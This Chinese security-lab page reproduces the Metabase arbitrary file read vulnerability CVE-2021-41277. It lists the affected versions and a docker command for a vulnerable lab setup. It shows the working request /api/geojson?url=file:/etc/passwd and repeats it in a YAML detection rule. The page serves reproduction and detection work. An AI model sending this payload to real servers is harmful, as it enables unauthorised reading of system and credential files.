MetaBase 任意文件读取漏洞(CVE-20-漏洞文库小世界-安全文库-NGC660安全实验室

MetaBase 任意文件读取漏洞(CVE-20

MetaBase 任意文件读取漏洞(CVE-2021-41277) 复现

受影响的版本

x.40.0、x.40.1、x.40.2、x.40.3、x.40.4

环境搭建

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

安装完成后
m_05a407342543e3cc45a61ba1cbdd1212_r

漏洞复现

http://URL+/api/geojson?url=file:/etc/passwd
m_574c905e5828870b9280e8ebd67d10c1_r

检测poc规则编写

params: []
name: MetaBase 任意文件读取漏洞(CVE-2021-41277)
set: {}
rules:
- method: GET
  path: /api/geojson?url=file:/etc/passwd
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"root")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""

m_aa58b452bfce59535033130afbe6b638_r

请登录后发表评论

    请登录后查看回复内容